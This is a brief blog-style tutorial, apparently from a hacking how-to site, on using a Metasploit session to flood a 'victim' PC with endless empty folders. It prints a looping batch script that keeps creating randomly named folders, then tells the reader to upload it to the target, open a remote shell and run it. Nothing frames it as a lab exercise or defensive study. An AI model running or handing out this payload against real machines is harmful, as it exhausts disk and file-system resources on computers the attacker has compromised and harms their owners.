How to Create unlimited Folder in Remote Victim PC using Metasploit

Open leafpad and type the following code.

:loop
md %random%
goto loop

Now save it as a batch file


Now Use the upload command to send Batch File to the target system.


 Now type shell to enter into Victims command prompt and execute the batch file. It will create unlimited blank folder in victim pc


0 comments:

Post a Comment